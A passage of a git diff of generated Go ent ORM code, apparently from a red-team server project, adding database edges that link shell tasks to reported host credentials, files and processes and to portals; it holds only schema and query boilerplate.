unique edge "Portal.task"`) - } if puo.mutation.BeaconCleared() && len(puo.mutation.BeaconIDs()) > 0 { return errors.New(`ent: clearing a required unique edge "Portal.beacon"`) } @@ -620,6 +710,35 @@ func (puo *PortalUpdateOne) sqlSave(ctx context.Context) (_node *Portal, err err } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if puo.mutation.ShellTaskCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: false, + Table: portal.ShellTaskTable, + Columns: []string{portal.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := puo.mutation.ShellTaskIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.M2O, + Inverse: false, + Table: portal.ShellTaskTable, + Columns: []string{portal.ShellTaskColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(shelltask.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } if puo.mutation.BeaconCleared() { edge := &sqlgraph.EdgeSpec{ Rel: sqlgraph.M2O, diff --git a/tavern/internal/ent/schema/host_credential.go b/tavern/internal/ent/schema/host_credential.go index acfd977b2..abcfcf020 100644 --- a/tavern/internal/ent/schema/host_credential.go +++ b/tavern/internal/ent/schema/host_credential.go @@ -54,6 +54,13 @@ func (HostCredential) Edges() []ent.Edge { entsql.OnDelete(entsql.Cascade), ). Comment("Task that reported this credential."), + edge.From("shell_task", ShellTask.Type). + Unique(). + Ref("reported_credentials"). + Annotations( + entsql.OnDelete(entsql.Cascade), + ). + Comment("Shell Task that reported this credential."), } } diff --git a/tavern/internal/ent/schema/host_file.go b/tavern/internal/ent/schema/host_file.go index a6c5f549e..55cf0daa2 100644 --- a/tavern/internal/ent/schema/host_file.go +++ b/tavern/internal/ent/schema/host_file.go @@ -74,13 +74,19 @@ func (HostFile) Edges() []ent.Edge { ). Comment("Host the file was reported on."), edge.From("task", Task.Type). - Required(). Unique(). Ref("reported_files"). Annotations( entsql.OnDelete(entsql.Cascade), ). Comment("Task that reported this file."), + edge.From("shell_task", ShellTask.Type). + Unique(). + Ref("reported_files"). + Annotations( + entsql.OnDelete(entsql.Cascade), + ). + Comment("Shell Task that reported this file."), } } diff --git a/tavern/internal/ent/schema/host_process.go b/tavern/internal/ent/schema/host_process.go index 62135db06..aeb60c5a5 100644 --- a/tavern/internal/ent/schema/host_process.go +++ b/tavern/internal/ent/schema/host_process.go @@ -67,13 +67,19 @@ func (HostProcess) Edges() []ent.Edge { ). Comment("Host the process was reported on."), edge.From("task", Task.Type). - Required(). Unique(). Ref("reported_processes"). Annotations( entsql.OnDelete(entsql.Cascade), ). Comment("Task that reported this process."), + edge.From("shell_task", ShellTask.Type). + Unique(). + Ref("reported_processes"). + Annotations( + entsql.OnDelete(entsql.Cascade), + ). + Comment("Shell Task that reported this process."), } } diff --git a/tavern/internal/ent/schema/portal.go b/tavern/internal/ent/schema/portal.go index 3e84778e6..5bde77288 100644 --- a/tavern/internal/ent/schema/portal.go +++ b/tavern/internal/ent/schema/portal.go @@ -32,8 +32,10 @@ func (Portal) Edges() []ent.Edge { return []ent.Edge{ edge.To("task", Task.Type). Unique(). - Required(). Comment("Task that created the portal"), + edge.To("shell_task", ShellTask.Type). + Unique(). + Comment("ShellTask that created the portal"), edge.To("beacon", Beacon.Type). Unique(). Required(). diff --git a/tavern/internal/ent/schema/shell_task.go b/tavern/internal/ent/schema/shell_task.go index 03f44b595..4174b64bd 100644 --- a/tavern/internal/ent/schema/shell_task.go +++ b/tavern/internal/ent/schema/shell_task.go @@ -3,6 +3,7 @@ package schema import ( "entgo.io/contrib/entgql" "entgo.io/ent" + "entgo.io/ent/dialect/entsql" "entgo.io/ent/schema" "entgo.io/ent/schema/edge" "entgo.io/ent/schema/field" @@ -61,6 +62,21 @@ func (ShellTask) Edges() []ent.Edge { Unique(). Required(). Comment("The user who created this ShellTask"), + edge.To("reported_credentials", HostCredential.Type). + Annotations( + entsql.OnDelete(entsql.Cascade), + ). + Comment("Credentials reported by this shell task"), + edge.To("reported_files", HostFile.Type). + Annotations( + entsql.OnDelete(entsql.Cascade), + ). + Comment("Files reported by this shell task"), + edge.To("reported_processes", HostProcess.Type). + Annotations( + entsql.OnDelete(entsql.Cascade), + ). + Comment("Processes reported by this shell task"), } } diff --git a/tavern/internal/ent/shelltask.go b/tavern/internal/ent/shelltask.go index a057f167f..786135125 100644 --- a/tavern/internal/ent/shelltask.go +++ b/tavern/internal/ent/shelltask.go @@ -53,11 +53,21 @@ type ShellTaskEdges struct { Shell *Shell `json:"shell,omitempty"` // The user who created this ShellTask Creator *User `json:"creator,omitempty"` + // Credentials reported by this shell task + ReportedCredentials []*HostCredential `json:"reported_credentials,omitempty"` + // Files reported by this shell task + ReportedFiles []*HostFile `json:"reported_files,omitempty"` + // Processes reported by this shell task + ReportedProcesses []*HostProcess `json:"reported_processes,omitempty"` // loadedTypes holds the information for reporting if a // type was loaded (or requested) in eager-loading or not. - loadedTypes [2]bool + loadedTypes [5]bool // totalCount holds the count of the edges above. - totalCount [2]map[string]int + totalCount [5]map[string]int + + namedReportedCredentials map[string][]*HostCredential + namedReportedFiles map[string][]*HostFile + namedReportedProcesses map[string][]*HostProcess } // ShellOrErr returns the Shell value or an error if the edge @@ -82,6 +92,33 @@ func (e ShellTaskEdges) CreatorOrErr() (*User, error) { return nil, &NotLoadedError{edge: "creator"} } +// ReportedCredentialsOrErr returns the ReportedCredentials value or an error if the edge +// was not loaded in eager-loading. +func (e ShellTaskEdges) ReportedCredentialsOrErr() ([]*HostCredential, error) { + if e.loadedTypes[2] { + return e.ReportedCredentials, nil + } + return nil, &NotLoadedError{edge: "reported_credentials"} +} + +// ReportedFilesOrErr returns the ReportedFiles value or an error if the edge +// was not loaded in eager-loading. +func (e ShellTaskEdges) ReportedFilesOrErr() ([]*HostFile, error) { + if e.loadedTypes[3] { + return e.ReportedFiles, nil + } + return nil, &NotLoadedError{edge: "reported_files"} +} + +// ReportedProcessesOrErr returns the ReportedProcesses value or an error if the edge +// was not loaded in eager-loading. +func (e ShellTaskEdges) ReportedProcessesOrErr() ([]*HostProcess, error) { + if e.loadedTypes[4] { + return e.ReportedProcesses, nil + } + return nil, &NotLoadedError{edge: "reported_processes"} +} + // scanValues returns the types for scanning values from sql.Rows. func (*ShellTask) scanValues(columns []string) ([]any, error) { values := make([]any, len(columns)) @@ -215,6 +252,21 @@ func (st *ShellTask) QueryCreator() *UserQuery { return NewShellTaskClient(st.config).QueryCreator(st) } +// QueryReportedCredentials queries the "reported_credentials" edge of the ShellTask entity. +func (st *ShellTask) QueryReportedCredentials() *HostCredentialQuery { + return NewShellTaskClient(st.config).QueryReportedCredentials(st) +} + +// QueryReportedFiles queries the "reported_files" edge of the ShellTask entity. +func (st *ShellTask) QueryReportedFiles() *HostFileQuery { + return NewShellTaskClient(st.config).QueryReportedFiles(st) +} + +// QueryReportedProcesses queries the "reported_processes" edge of the ShellTask entity. +func (st *ShellTask) QueryReportedProcesses() *HostProcessQuery { + return NewShellTaskClient(st.config).QueryReportedProcesses(st) +} + // Update returns a builder for updating this ShellTask. // Note that you need to call ShellTask.Unwrap() before calling this method if this ShellTask // was returned from a transaction, and the transaction was committed or rolled back. @@ -271,5 +323,77 @@ func (st *ShellTask) String() string { return builder.String() } +// NamedReportedCredentials returns the ReportedCredentials named value or an error if the edge was not +// loaded in eager-loading with this name. +func (st *ShellTask) NamedReportedCredentials(name string) ([]*HostCredential, error) { + if st.Edges.namedReportedCredentials == nil { + return nil, &NotLoadedError{edge: name} + } + nodes, ok := st.Edges.namedReportedCredentials[name] + if !ok { + return nil, &NotLoadedError{edge: name} + } + return nodes, nil +} + +func (st *ShellTask) appendNamedReportedCredentials(name string, edges ...*HostCredential) { + if st.Edges.namedReportedCredentials == nil { + st.Edges.namedReportedCredentials = make(map[string][]*HostCredential) + } + if len(edges) == 0 { + st.Edges.namedReportedCredentials[name] = []*HostCredential{} + } else { + st.Edges.namedReportedCredentials[name] = append(st.Edges.namedReportedCredentials[name], edges...) + } +} + +// NamedReportedFiles returns the ReportedFiles named value or an error if the edge was not +// loaded in eager-loading with this name. +func (st *ShellTask) NamedReportedFiles(name string) ([]*HostFile, error) { + if st.Edges.namedReportedFiles == nil { + return nil, &NotLoadedError{edge: name} + } + nodes, ok := st.Edges.namedReportedFiles[name] + if !ok { + return nil, &NotLoadedError{edge: name} + } + return nodes, nil +} + +func (st *ShellTask) appendNamedReportedFiles(name string, edges ...*HostFile) { + if st.Edges.namedReportedFiles == nil { + st.Edges.namedReportedFiles = make(map[string][]*HostFile) + } + if len(edges) == 0 { + st.Edges.namedReportedFiles[name] = []*HostFile{} + } else { + st.Edges.namedReportedFiles[name] = append(st.Edges.namedReportedFiles[name], edges...) + } +} + +// NamedReportedProcesses returns the ReportedProcesses named value or an error if the edge was not +// loaded in eager-loading with this name. +func (st *ShellTask) NamedReportedProcesses(name string) ([]*HostProcess, error) { + if st.Edges.namedReportedProcesses == nil { + return nil, &NotLoadedError{edge: name} + } + nodes, ok := st.Edges.namedReportedProcesses[name] + if !ok { + return nil, &NotLoadedError{edge: name} + } + return nodes, nil +} + +func (st *ShellTask) appendNamedReportedProcesses(name string, edges ...*HostProcess) { + if st.Edges.namedReportedProcesses == nil { + st.Edges.namedReportedProcesses = make(map[string][]*HostProcess) + } + if len(edges) == 0 { + st.Edges.namedReportedProcesses[name] = []*HostProcess{} + } else { + st.Edges.namedReportedProcesses[name] = append(st.Edges.namedReportedProcesses[name], edges...) + } +} + // ShellTasks is a parsable slice of ShellTask. type ShellTasks []*ShellTask diff --git a/tavern/internal/ent/shelltask/shelltask.go b/tavern/internal/ent/shelltask/shelltask.go index a6e2fa12f..6f1cba655 100644 --- a/tavern/internal/ent/shelltask/shelltask.go +++ b/tavern/internal/ent/shelltask/shelltask.go @@ -38,6 +38,12 @@ const ( EdgeShell = "shell" // EdgeCreator holds the string denoting the creator edge name in mutations. EdgeCreator = "creator" + // EdgeReportedCredentials holds the string denoting the reported_credentials edge name in mutations. + EdgeReportedCredentials = "reported_credentials" + // EdgeReportedFiles holds the string denoting the reported_files edge name in mutations. + EdgeReportedFiles = "reported_files" + // EdgeReportedProcesses holds the string denoting the reported_processes edge name in mutations. + EdgeReportedProcesses = "reported_processes" // Table holds the table name of the shelltask in the database. Table = "shell_tasks" // ShellTable is the table that holds the shell relation/edge. @@ -54,6 +60,27 @@ const ( CreatorInverseTable = "users" // CreatorColumn is the table column denoting the creator relation/edge. CreatorColumn = "shell_task_creator" + // ReportedCredentialsTable is the table that holds the reported_credentials relation/edge. + ReportedCredentialsTable = "host_credentials" + // ReportedCredentialsInverseTable is the table name for the HostCredential entity. + // It exists in this package in order to avoid circular dependency with the "hostcredential" package. + ReportedCredentialsInverseTable = "host_credentials" + // ReportedCredentialsColumn is the table column denoting the reported_credentials relation/edge. + ReportedCredentialsColumn = "shell_task_reported_credentials" + // ReportedFilesTable is the table that holds the reported_files relation/edge. + ReportedFilesTable = "host_files" + // ReportedFilesInverseTable is the table name for the HostFile entity. + // It exists in this package in order to avoid circular dependency with the "hostfile" package. + ReportedFilesInverseTable = "host_files" + // ReportedFilesColumn is the table column denoting the reported_files relation/edge. + ReportedFilesColumn = "shell_task_reported_files" + // ReportedProcessesTable is the table that holds the reported_processes relation/edge. + ReportedProcessesTable = "host_processes" + // ReportedProcessesInverseTable is the table name for the HostProcess entity. + // It exists in this package in order to avoid circular dependency with the "hostprocess" package. + ReportedProcessesInverseTable = "host_processes" + // ReportedProcessesColumn is the table column denoting the reported_processes relation/edge. + ReportedProcessesColumn = "shell_task_reported_processes" ) // Columns holds all SQL columns for shelltask fields. @@ -173,6 +200,48 @@ func ByCreatorField(field string, opts ...sql.OrderTermOption) OrderOption { sqlgraph.OrderByNeighborTerms(s, newCreatorStep(), sql.OrderByField(field, opts...)) } } + +// ByReportedCredentialsCount orders the results by reported_credentials count. +func ByReportedCredentialsCount(opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborsCount(s, newReportedCredentialsStep(), opts...) + } +} + +// ByReportedCredentials orders the results by reported_credentials terms. +func ByReportedCredentials(term sql.OrderTerm, terms ...sql.OrderTerm) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newReportedCredentialsStep(), append([]sql.OrderTerm{term}, terms...)...) + } +} + +// ByReportedFilesCount orders the results by reported_files count. +func ByReportedFilesCount(opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborsCount(s, newReportedFilesStep(), opts...) + } +} + +// ByReportedFiles orders the results by reported_files terms. +func ByReportedFiles(term sql.OrderTerm, terms ...sql.OrderTerm) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newReportedFilesStep(), append([]sql.OrderTerm{term}, terms...)...) + } +} + +// ByReportedProcessesCount orders the results by reported_processes count. +func ByReportedProcessesCount(opts ...sql.OrderTermOption) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborsCount(s, newReportedProcessesStep(), opts...) + } +} + +// ByReportedProcesses orders the results by reported_processes terms. +func ByReportedProcesses(term sql.OrderTerm, terms ...sql.OrderTerm) OrderOption { + return func(s *sql.Selector) { + sqlgraph.OrderByNeighborTerms(s, newReportedProcessesStep(), append([]sql.OrderTerm{term}, terms...)...) + } +} func newShellStep() *sqlgraph.Step { return sqlgraph.NewStep( sqlgraph.From(Table, FieldID), @@ -187,3 +256,24 @@ func newCreatorStep() *sqlgraph.Step { sqlgraph.Edge(sqlgraph.M2O, false, CreatorTable, CreatorColumn), ) } +func newReportedCredentialsStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ReportedCredentialsInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, ReportedCredentialsTable, ReportedCredentialsColumn), + ) +} +func newReportedFilesStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ReportedFilesInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, ReportedFilesTable, ReportedFilesColumn), + ) +} +func newReportedProcessesStep() *sqlgraph.Step { + return sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.To(ReportedProcessesInverseTable, FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, ReportedProcessesTable, ReportedProcessesColumn), + ) +} diff --git a/tavern/internal/ent/shelltask/where.go b/tavern/internal/ent/shelltask/where.go index 75caee3de..1a1c1baea 100644 --- a/tavern/internal/ent/shelltask/where.go +++ b/tavern/internal/ent/shelltask/where.go @@ -701,6 +701,75 @@ func HasCreatorWith(preds ...predicate.User) predicate.ShellTask { }) } +// HasReportedCredentials applies the HasEdge predicate on the "reported_credentials" edge. +func HasReportedCredentials() predicate.ShellTask { + return predicate.ShellTask(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, ReportedCredentialsTable, ReportedCredentialsColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasReportedCredentialsWith applies the HasEdge predicate on the "reported_credentials" edge with a given conditions (other predicates). +func HasReportedCredentialsWith(preds ...predicate.HostCredential) predicate.ShellTask { + return predicate.ShellTask(func(s *sql.Selector) { + step := newReportedCredentialsStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + +// HasReportedFiles applies the HasEdge predicate on the "reported_files" edge. +func HasReportedFiles() predicate.ShellTask { + return predicate.ShellTask(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, ReportedFilesTable, ReportedFilesColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasReportedFilesWith applies the HasEdge predicate on the "reported_files" edge with a given conditions (other predicates). +func HasReportedFilesWith(preds ...predicate.HostFile) predicate.ShellTask { + return predicate.ShellTask(func(s *sql.Selector) { + step := newReportedFilesStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + +// HasReportedProcesses applies the HasEdge predicate on the "reported_processes" edge. +func HasReportedProcesses() predicate.ShellTask { + return predicate.ShellTask(func(s *sql.Selector) { + step := sqlgraph.NewStep( + sqlgraph.From(Table, FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, ReportedProcessesTable, ReportedProcessesColumn), + ) + sqlgraph.HasNeighbors(s, step) + }) +} + +// HasReportedProcessesWith applies the HasEdge predicate on the "reported_processes" edge with a given conditions (other predicates). +func HasReportedProcessesWith(preds ...predicate.HostProcess) predicate.ShellTask { + return predicate.ShellTask(func(s *sql.Selector) { + step := newReportedProcessesStep() + sqlgraph.HasNeighborsWith(s, step, func(s *sql.Selector) { + for _, p := range preds { + p(s) + } + }) + }) +} + // And groups predicates with the AND operator between them. func And(predicates ...predicate.ShellTask) predicate.ShellTask { return predicate.ShellTask(sql.AndPredicates(predicates...)) diff --git a/tavern/internal/ent/shelltask_create.go b/tavern/internal/ent/shelltask_create.go index e17b90cdd..372bdeb58 100644 --- a/tavern/internal/ent/shelltask_create.go +++ b/tavern/internal/ent/shelltask_create.go @@ -11,6 +11,9 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" + "realm.pub/tavern/internal/ent/hostcredential" + "realm.pub/tavern/internal/ent/hostfile" + "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/shell" "realm.pub/tavern/internal/ent/shelltask" "realm.pub/tavern/internal/ent/user" @@ -162,6 +165,51 @@ func (stc *ShellTaskCreate) SetCreator(u *User) *ShellTaskCreate { return stc.SetCreatorID(u.ID) } +// AddReportedCredentialIDs adds the "reported_credentials" edge to the HostCredential entity by IDs. +func (stc *ShellTaskCreate) AddReportedCredentialIDs(ids ...int) *ShellTaskCreate { + stc.mutation.AddReportedCredentialIDs(ids...) + return stc +} + +// AddReportedCredentials adds the "reported_credentials" edges to the HostCredential entity. +func (stc *ShellTaskCreate) AddReportedCredentials(h ...*HostCredential) *ShellTaskCreate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stc.AddReportedCredentialIDs(ids...) +} + +// AddReportedFileIDs adds the "reported_files" edge to the HostFile entity by IDs. +func (stc *ShellTaskCreate) AddReportedFileIDs(ids ...int) *ShellTaskCreate { + stc.mutation.AddReportedFileIDs(ids...) + return stc +} + +// AddReportedFiles adds the "reported_files" edges to the HostFile entity. +func (stc *ShellTaskCreate) AddReportedFiles(h ...*HostFile) *ShellTaskCreate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stc.AddReportedFileIDs(ids...) +} + +// AddReportedProcessIDs adds the "reported_processes" edge to the HostProcess entity by IDs. +func (stc *ShellTaskCreate) AddReportedProcessIDs(ids ...int) *ShellTaskCreate { + stc.mutation.AddReportedProcessIDs(ids...) + return stc +} + +// AddReportedProcesses adds the "reported_processes" edges to the HostProcess entity. +func (stc *ShellTaskCreate) AddReportedProcesses(h ...*HostProcess) *ShellTaskCreate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stc.AddReportedProcessIDs(ids...) +} + // Mutation returns the ShellTaskMutation object of the builder. func (stc *ShellTaskCreate) Mutation() *ShellTaskMutation { return stc.mutation @@ -331,6 +379,54 @@ func (stc *ShellTaskCreate) createSpec() (*ShellTask, *sqlgraph.CreateSpec) { _node.shell_task_creator = &nodes[0] _spec.Edges = append(_spec.Edges, edge) } + if nodes := stc.mutation.ReportedCredentialsIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges = append(_spec.Edges, edge) + } + if nodes := stc.mutation.ReportedFilesIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges = append(_spec.Edges, edge) + } + if nodes := stc.mutation.ReportedProcessesIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges = append(_spec.Edges, edge) + } return _node, _spec } diff --git a/tavern/internal/ent/shelltask_query.go b/tavern/internal/ent/shelltask_query.go index fa12ebfcd..3d400ebd2 100644 --- a/tavern/internal/ent/shelltask_query.go +++ b/tavern/internal/ent/shelltask_query.go @@ -4,6 +4,7 @@ package ent import ( "context" + "database/sql/driver" "fmt" "math" @@ -11,6 +12,9 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" + "realm.pub/tavern/internal/ent/hostcredential" + "realm.pub/tavern/internal/ent/hostfile" + "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/predicate" "realm.pub/tavern/internal/ent/shell" "realm.pub/tavern/internal/ent/shelltask" @@ -20,15 +24,21 @@ import ( // ShellTaskQuery is the builder for querying ShellTask entities. type ShellTaskQuery struct { config - ctx *QueryContext - order []shelltask.OrderOption - inters []Interceptor - predicates []predicate.ShellTask - withShell *ShellQuery - withCreator *UserQuery - withFKs bool - modifiers []func(*sql.Selector) - loadTotal []func(context.Context, []*ShellTask) error + ctx *QueryContext + order []shelltask.OrderOption + inters []Interceptor + predicates []predicate.ShellTask + withShell *ShellQuery + withCreator *UserQuery + withReportedCredentials *HostCredentialQuery + withReportedFiles *HostFileQuery + withReportedProcesses *HostProcessQuery + withFKs bool + modifiers []func(*sql.Selector) + loadTotal []func(context.Context, []*ShellTask) error + withNamedReportedCredentials map[string]*HostCredentialQuery + withNamedReportedFiles map[string]*HostFileQuery + withNamedReportedProcesses map[string]*HostProcessQuery // intermediate query (i.e. traversal path). sql *sql.Selector path func(context.Context) (*sql.Selector, error) @@ -109,6 +119,72 @@ func (stq *ShellTaskQuery) QueryCreator() *UserQuery { return query } +// QueryReportedCredentials chains the current query on the "reported_credentials" edge. +func (stq *ShellTaskQuery) QueryReportedCredentials() *HostCredentialQuery { + query := (&HostCredentialClient{config: stq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := stq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := stq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(shelltask.Table, shelltask.FieldID, selector), + sqlgraph.To(hostcredential.Table, hostcredential.FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, shelltask.ReportedCredentialsTable, shelltask.ReportedCredentialsColumn), + ) + fromU = sqlgraph.SetNeighbors(stq.driver.Dialect(), step) + return fromU, nil + } + return query +} + +// QueryReportedFiles chains the current query on the "reported_files" edge. +func (stq *ShellTaskQuery) QueryReportedFiles() *HostFileQuery { + query := (&HostFileClient{config: stq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := stq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := stq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(shelltask.Table, shelltask.FieldID, selector), + sqlgraph.To(hostfile.Table, hostfile.FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, shelltask.ReportedFilesTable, shelltask.ReportedFilesColumn), + ) + fromU = sqlgraph.SetNeighbors(stq.driver.Dialect(), step) + return fromU, nil + } + return query +} + +// QueryReportedProcesses chains the current query on the "reported_processes" edge. +func (stq *ShellTaskQuery) QueryReportedProcesses() *HostProcessQuery { + query := (&HostProcessClient{config: stq.config}).Query() + query.path = func(ctx context.Context) (fromU *sql.Selector, err error) { + if err := stq.prepareQuery(ctx); err != nil { + return nil, err + } + selector := stq.sqlQuery(ctx) + if err := selector.Err(); err != nil { + return nil, err + } + step := sqlgraph.NewStep( + sqlgraph.From(shelltask.Table, shelltask.FieldID, selector), + sqlgraph.To(hostprocess.Table, hostprocess.FieldID), + sqlgraph.Edge(sqlgraph.O2M, false, shelltask.ReportedProcessesTable, shelltask.ReportedProcessesColumn), + ) + fromU = sqlgraph.SetNeighbors(stq.driver.Dialect(), step) + return fromU, nil + } + return query +} + // First returns the first ShellTask entity from the query. // Returns a *NotFoundError when no ShellTask was found. func (stq *ShellTaskQuery) First(ctx context.Context) (*ShellTask, error) { @@ -296,13 +372,16 @@ func (stq *ShellTaskQuery) Clone() *ShellTaskQuery { return nil } return &ShellTaskQuery{ - config: stq.config, - ctx: stq.ctx.Clone(), - order: append([]shelltask.OrderOption{}, stq.order...), - inters: append([]Interceptor{}, stq.inters...), - predicates: append([]predicate.ShellTask{}, stq.predicates...), - withShell: stq.withShell.Clone(), - withCreator: stq.withCreator.Clone(), + config: stq.config, + ctx: stq.ctx.Clone(), + order: append([]shelltask.OrderOption{}, stq.order...), + inters: append([]Interceptor{}, stq.inters...), + predicates: append([]predicate.ShellTask{}, stq.predicates...), + withShell: stq.withShell.Clone(), + withCreator: stq.withCreator.Clone(), + withReportedCredentials: stq.withReportedCredentials.Clone(), + withReportedFiles: stq.withReportedFiles.Clone(), + withReportedProcesses: stq.withReportedProcesses.Clone(), // clone intermediate query. sql: stq.sql.Clone(), path: stq.path, @@ -331,6 +410,39 @@ func (stq *ShellTaskQuery) WithCreator(opts ...func(*UserQuery)) *ShellTaskQuery return stq } +// WithReportedCredentials tells the query-builder to eager-load the nodes that are connected to +// the "reported_credentials" edge. The optional arguments are used to configure the query builder of the edge. +func (stq *ShellTaskQuery) WithReportedCredentials(opts ...func(*HostCredentialQuery)) *ShellTaskQuery { + query := (&HostCredentialClient{config: stq.config}).Query() + for _, opt := range opts { + opt(query) + } + stq.withReportedCredentials = query + return stq +} + +// WithReportedFiles tells the query-builder to eager-load the nodes that are connected to +// the "reported_files" edge. The optional arguments are used to configure the query builder of the edge. +func (stq *ShellTaskQuery) WithReportedFiles(opts ...func(*HostFileQuery)) *ShellTaskQuery { + query := (&HostFileClient{config: stq.config}).Query() + for _, opt := range opts { + opt(query) + } + stq.withReportedFiles = query + return stq +} + +// WithReportedProcesses tells the query-builder to eager-load the nodes that are connected to +// the "reported_processes" edge. The optional arguments are used to configure the query builder of the edge. +func (stq *ShellTaskQuery) WithReportedProcesses(opts ...func(*HostProcessQuery)) *ShellTaskQuery { + query := (&HostProcessClient{config: stq.config}).Query() + for _, opt := range opts { + opt(query) + } + stq.withReportedProcesses = query + return stq +} + // GroupBy is used to group vertices by one or more fields/columns. // It is often used with aggregate functions, like: count, max, mean, min, sum. // @@ -410,9 +522,12 @@ func (stq *ShellTaskQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([]*S nodes = []*ShellTask{} withFKs = stq.withFKs _spec = stq.querySpec() - loadedTypes = [2]bool{ + loadedTypes = [5]bool{ stq.withShell != nil, stq.withCreator != nil, + stq.withReportedCredentials != nil, + stq.withReportedFiles != nil, + stq.withReportedProcesses != nil, } ) if stq.withShell != nil || stq.withCreator != nil { @@ -454,6 +569,50 @@ func (stq *ShellTaskQuery) sqlAll(ctx context.Context, hooks ...queryHook) ([]*S return nil, err } } + if query := stq.withReportedCredentials; query != nil { + if err := stq.loadReportedCredentials(ctx, query, nodes, + func(n *ShellTask) { n.Edges.ReportedCredentials = []*HostCredential{} }, + func(n *ShellTask, e *HostCredential) { + n.Edges.ReportedCredentials = append(n.Edges.ReportedCredentials, e) + }); err != nil { + return nil, err + } + } + if query := stq.withReportedFiles; query != nil { + if err := stq.loadReportedFiles(ctx, query, nodes, + func(n *ShellTask) { n.Edges.ReportedFiles = []*HostFile{} }, + func(n *ShellTask, e *HostFile) { n.Edges.ReportedFiles = append(n.Edges.ReportedFiles, e) }); err != nil { + return nil, err + } + } + if query := stq.withReportedProcesses; query != nil { + if err := stq.loadReportedProcesses(ctx, query, nodes, + func(n *ShellTask) { n.Edges.ReportedProcesses = []*HostProcess{} }, + func(n *ShellTask, e *HostProcess) { n.Edges.ReportedProcesses = append(n.Edges.ReportedProcesses, e) }); err != nil { + return nil, err + } + } + for name, query := range stq.withNamedReportedCredentials { + if err := stq.loadReportedCredentials(ctx, query, nodes, + func(n *ShellTask) { n.appendNamedReportedCredentials(name) }, + func(n *ShellTask, e *HostCredential) { n.appendNamedReportedCredentials(name, e) }); 